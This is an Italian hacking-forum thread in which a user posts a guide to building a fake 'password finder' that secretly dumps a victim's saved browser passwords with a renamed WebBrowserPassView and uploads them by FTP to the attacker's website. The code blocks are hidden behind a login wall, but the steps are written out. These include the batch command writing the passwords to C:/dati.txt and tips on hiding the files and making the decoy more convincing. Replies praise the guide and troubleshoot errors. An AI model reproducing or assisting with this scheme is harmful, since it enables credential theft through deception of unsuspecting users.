• Regolamento Macrocategoria DEV
    Prima di aprire un topic nella Macrocategoria DEV, è bene leggerne il suo regolamento. Sei un'azienda o un hosting/provider? Qui sono anche contenute informazioni per collaborare con Sciax2 ed ottenere l'accredito nella nostra community!

Guida Scoprire tutte le password di un computer in remoto con Visual Basic

step997

Nuovo utente
Autore del topic
4 Settembre 2011
12
0
Miglior risposta
0
Benvenuti, questa è la mia prima guida ^^
Quando mi è venuta l'idea di unire il Visual Basic al Batch per creare questo programma sono rimasto stupito da me stesso xD :shock:
Premetto che io lavoro in Visual Basic 2010 Express
Bene, detto questo, passiamo alla guida:

Per prima cosa, scarichiamo WebBrowserPassView dal sito della
Perfavore, Entra oppure Registrati per vedere i Link!
.
Potete trovarlo qui ->
Perfavore, Entra oppure Registrati per vedere i Link!

Una volta scaricato estrate solo il file .exe sul desktop, il resto potete anche eliminarlo.
Rinominate WebBrowserPassView.exe in "web.exe".

Fatto questo apriamo Visual Basic e creiamo un nuovo Form.
Inseriamo un Button, un Label e una Textbox (La Texbox non serve in realtà, è per fare scena, ma vi spiego dopo xD). Chiamate il Label "E-Mail Vittima".
Dovreste trovarvi una cosa del genere:
35bxkky.png

Posizionateli come volete dopodichè fate doppio click su una parte qualsiasi del form così da ottenere la finestra con i codici.
Cancellate tutto e inserite questo codice:

Codice:
Perfavore, Entra oppure Registrati per vedere i codici!

Così non avete capito niente, vi spiego il codice..
Non fa altro che inviare un file che poi creeremo tarmite un comando batch al un nostro sito web su Altervista.

Modificate le parti in blu con i vostri dati e salvate il programma con il nome di "Password.exe", dopodichè andatelo a cercare nella cartella di Visual Studio e mettetelo sul desktop.

Ora passiamo alla parte del Bacht, apriamo il blocco note e scriviamo:
Codice:
Perfavore, Entra oppure Registrati per vedere i codici!

E salviamo come Trova Password.bat
Abbiamo quasi finito, dobbiamo solo rifinire i dettagli.
Creiamo una cartella e chiamiamola "Trova Password", mettiamoci dentro "Password.exe", "web.exe" e "Trova Password.bat"
Selezioniamo "web.exe" e "Password.exe" e impostiamo le preferenze in modo che siano invisibili nella cartella.
Fatto questo vi troverete nella cartella solo il file Trova Password.bat (Un consiglio, potete convertirlo in exe per renderlo più convincente)

E' tutto pronto, ma cosa fa?
Nel momento in cui la vittima apre Trova Password.bat si crea un file .txt in C:/ con tutte le password presenti nei browser. Subito dopo si apre il diversivo, il finto programma per trovare le password e quando la vittima cliccherà sul pulsante "Trova Password" il file .txt con tutti i dati verrò inviato tramite ftp al vostro sito web e il programma restituirà un messaggio di errore.
Vi basterà andare su
Perfavore, Entra oppure Registrati per vedere i Link!
e troverete il bottino! Per problemi commentate :emoji_slight_smile:

Fonte: Ore e ore di studio dei codici, non copiare!

(Se posso permettermi di dirlo, questa andrebbe in rilievo ^^ )
 
Ultima modifica:
Riferimento: Scoprire tutte le password di un computer in remoto con Visual Basic

molto carina anche se è simile ad un cookie grabber.Però bravo x l'impegno potrebbe rivelarsi utile x molti utenti ^^
 
Riferimento: Scoprire tutte le password di un computer in remoto con Visual Basic

Benvenuti, questa è la mia prima guida ^^
Quando mi è venuta l'idea di unire il Visual Basic al Batch per creare questo programma sono rimasto stupito da me stesso xD :shock:
Premetto che io lavoro in Visual Basic 2010 Express
Bene, detto questo, passiamo alla guida:

Per prima cosa, scarichiamo WebBrowserPassView dal sito della
Perfavore, Entra oppure Registrati per vedere i Link!
.
Potete trovarlo qui -> [
Perfavore, Entra oppure Registrati per vedere i Link!

Una volta scaricato estrate solo il file .exe sul desktop, il resto potete anche eliminarlo.
Rinominate WebBrowserPassView.exe in "web.exe".

Fatto questo apriamo Visual Basic e creiamo un nuovo Form.
Inseriamo un Button, un Label e una Textbox (La Texbox non serve in realtà, è per fare scena, ma vi spiego dopo xD). Chiamate il Label "E-Mail Vittima".
Dovreste trovarvi una cosa del genere:
35bxkky.png

Posizionateli come volete dopodichè fate doppio click su una parte qualsiasi del form così da ottenere la finestra con i codici.
Cancellate tutto e inserite questo codice:

Codice:
Perfavore, Entra oppure Registrati per vedere i codici!

Così non avete capito niente, vi spiego il codice..
Non fa altro che inviare un file che poi creeremo tarmite un comando batch al un nostro sito web su Altervista.

Modificate le parti in blu con i vostri dati e salvate il programma con il nome di "Password.exe", dopodichè andatelo a cercare nella cartella di Visual Studio e mettetelo sul desktop.

Ora passiamo alla parte del Bacht, apriamo il blocco note e scriviamo:
Codice:
Perfavore, Entra oppure Registrati per vedere i codici!

E salviamo come Trova Password.bat
Abbiamo quasi finito, dobbiamo solo rifinire i dettagli.
Creiamo una cartella e chiamiamola "Trova Password", mettiamoci dentro "Password.exe", "web.exe" e "Trova Password.bat"
Selezioniamo "web.exe" e "Password.exe" e impostiamo le preferenze in modo che siano invisibili nella cartella.
Fatto questo vi troverete nella cartella solo il file Trova Password.bat (Un consiglio, potete convertirlo in exe per renderlo più convincente)

E' tutto pronto, ma cosa fa?
Nel momento in cui la vittima apre Trova Password.bat si crea un file .txt in C:/ con tutte le password presenti nei browser. Subito dopo si apre il diversivo, il finto programma per trovare le password e quando la vittima cliccherà sul pulsante "Trova Password" il file .txt con tutti i dati verrò inviato tramite ftp al vostro sito web e il programma restituirà un messaggio di errore.
Vi basterà andare su
Perfavore, Entra oppure Registrati per vedere i Link!
e troverete il bottino! Per problemi commentate :emoji_slight_smile:

Fonte: Ore e ore di studio dei codici, non copiare!

(Se posso permettermi di dirlo, questa andrebbe in rilievo ^^ )

grande stefanoooo bellissima guida
-lollo
 
Riferimento: Scoprire tutte le password di un computer in remoto con Visual Basic

Mi da quest errore
15n7vbd.png
 
Riferimento: Scoprire tutte le password di un computer in remoto con Visual Basic

L'errore indicato è che non trova il file c:\dati.txt ...

Lo avete creato prima con

@start web.exe /stext C:/dati.txt

???

P.S. E' possibile che su alcuni sistemi (Vista, Win7) non si possa creare il file dati.txt nella root di C: per problemi di sicurezza. In quel caso si deve usare una cartella dati in cui l'utente è autorizzato.
 
Riferimento: Scoprire tutte le password di un computer in remoto con Visual Basic

Utile :emoji_slight_smile:

Bella guida! patpat
 
Riferimento: Scoprire tutte le password di un computer in remoto con Visual Basic

Bellissima guida! La consiglio a tutti...Dopo tanto studio posso affermati che è un Bel lavoro!
 
Riferimento: Scoprire tutte le password di un computer in remoto con Visual Basic

L'errore indicato è che non trova il file c:\dati.txt ...

Lo avete creato prima con

@start web.exe /stext C:/dati.txt

???

P.S. E' possibile che su alcuni sistemi (Vista, Win7) non si possa creare il file dati.txt nella root di C: per problemi di sicurezza. In quel caso si deve usare una cartella dati in cui l'utente è autorizzato.

Ti garantisco che non è questo il problema, io uso Windows 7 e va tutto benissimo. Inoltre il programma è stato testato anche su Windows XP :emoji_smiley:
--------------- AGGIUNTA AL POST ---------------
Bellissima guida! La consiglio a tutti...Dopo tanto studio posso affermati che è un Bel lavoro!

Grazie =D
 
Ultima modifica:
Riferimento: Scoprire tutte le password di un computer in remoto con Visual Basic

Non dare garanzie troppo facilmente ...

Leggi bene quello che ho scritto ...

Nemmeno tu hai capito bene quello che ho scritto e comunque scusatemi se ho sbagliato.
 
Riferimento: Scoprire tutte le password di un computer in remoto con Visual Basic

Ciao, a me da errori di compatibilità col sistema 64 bit di seven... come risolvo? E comunque COMPLIMENTONI!
 
Riferimento: Scoprire tutte le password di un computer in remoto con Visual Basic

Non capisco una cosa.Che serve il file bat?Quello che fa puoi farlo sempre con lo stesso .exe che fai in vb.net...
Poi se un utente lascia impostato di vedere le cartelle nascoste vede tutto.
 
Riferimento: Scoprire tutte le password di un computer in remoto con Visual Basic

Il file .bat serve a fare tutto senza che l'utente se ne accorga..!!
E poi comunque hai ragione ma di solito gli utenti diciamo "medi" non sanno nemmeno dell'esistenza di questa opzione e di sicuro con questo programma non puoi fregare nessuno che abbia un minimo di conoscenza dell'informatica ;)
 
Riferimento: Scoprire tutte le password di un computer in remoto con Visual Basic

posso dire che di hack queste e tra le medie-peggiori... comunque bravo per l'impego!!:bye::bye:
 
Riferimento: Scoprire tutte le password di un computer in remoto con Visual Basic

pposso dire che di hack queste e tra le medie-peggiori... comunque bravo per l'impego!!:bye::bye:

Ma come cavolo scrivi?

Comunque carino anche se ormai nessuno più crede a queste cose purtroppo solo i cretini vanno a cercare un hack di facebook.
Però sei stato bravo con il codice e il .bat :emoji_slight_smile:
 
Riferimento: Scoprire tutte le password di un computer in remoto con Visual Basic

si ma quel programma come so io ti da solo le pass salvate mi puoi dire se ti trova tutte e pasword o e pass salvate?
 
Riferimento: Scoprire tutte le password di un computer in remoto con Visual Basic

Selezioniamo "web.exe" e "Password.exe" e impostiamo le preferenze in modo che siano invisibili nella cartella.
Fatto questo vi troverete nella cartella solo il file Trova Password.bat (Un consiglio, potete convertirlo in exe per renderlo più convincente)

ma che vuol dire?!
 
Riferimento: Scoprire tutte le password di un computer in remoto con Visual Basic

E' Fantastica ottimo lavoro posso notare che questa tua invenzione è una sorta di cookie grabber migliorato comunque ti posso dire che quasi tutti ci cascano bel lavoro , complimenti! :emoji_smiley:
 
Selezioniamo "web.exe" e "Password.exe" e impostiamo le preferenze in modo che siano invisibili nella cartella.
Fatto questo vi troverete nella cartella solo il file Trova Password.bat (Un consiglio, potete convertirlo in exe per renderlo più convincente)

ma che vuol dire?!

che vuol dire sto pezzo
--------------- AGGIUNTA AL POST ---------------
nessuno sa la spiegazione? :emoji_slight_frown:
--------------- AGGIUNTA AL POST ---------------
nessuno?????
 
Ultima modifica da un moderatore: